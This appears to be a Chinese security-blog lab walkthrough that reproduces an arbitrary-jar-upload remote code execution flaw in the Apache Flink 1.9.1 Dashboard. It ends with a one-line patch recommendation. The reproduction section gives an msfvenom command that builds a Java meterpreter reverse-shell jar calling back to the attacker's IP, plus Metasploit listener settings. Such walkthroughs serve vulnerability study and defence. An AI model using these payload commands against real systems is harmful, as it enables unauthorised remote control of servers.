溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

發(fā)布時間:2021-12-31 10:57:38 來源:億速云 閱讀:263 作者:小新 欄目:安全技術

這篇文章主要為大家展示了“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”,內容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領大家一起研究并學習一下“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”這篇文章吧。

0x00簡介

Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇并且已經應用與實際的業(yè)務場景中。很多公司在進行選型的時候都會選擇Apache Flink作為選型的對象。

Apache Flink能用來做什么?

  • 實時推薦系統(tǒng)

  • 實時報表

  • 實時數倉與ETL

  • 復雜事件處理

  • 實時欺詐與實時信用評估

  • 大數據安全監(jiān)測

Flink核心是一個流式的數據流執(zhí)行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能?;诹鲌?zhí)行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。

0x01漏洞介紹

攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執(zhí)行的目的

0x02影響范圍

至目前Apache Flink 1.9.1版本

0x03環(huán)境搭建

攻擊機kali:192.168.10.147

受害機Ubuntu:192.168.10.176

測試環(huán)境:Flink 1.9.1 java8+

Apache Flink 1.9.1安裝包下載:

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

下載完成后使用解壓

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

進入bin目錄運行./start-cluster.sh啟動環(huán)境

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

環(huán)境搭建成功 目標站點 http://192.168.10.176:8081

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

0x04漏洞復現

使用kali生成jar后門包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

  1. 攻擊機訪問目標站點 并上傳shell.jar

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

使用kali配置監(jiān)聽

use exploit/multi/handler

set payload java/shell/reverse_tcp

set RHOST 192.168.10.147

set LPORT 2020

run

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

點開剛剛上傳的shell.jar,觸發(fā)漏洞

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析

0x05修復方式

更新官網補丁或更新最新版本

以上是“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業(yè)資訊頻道!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI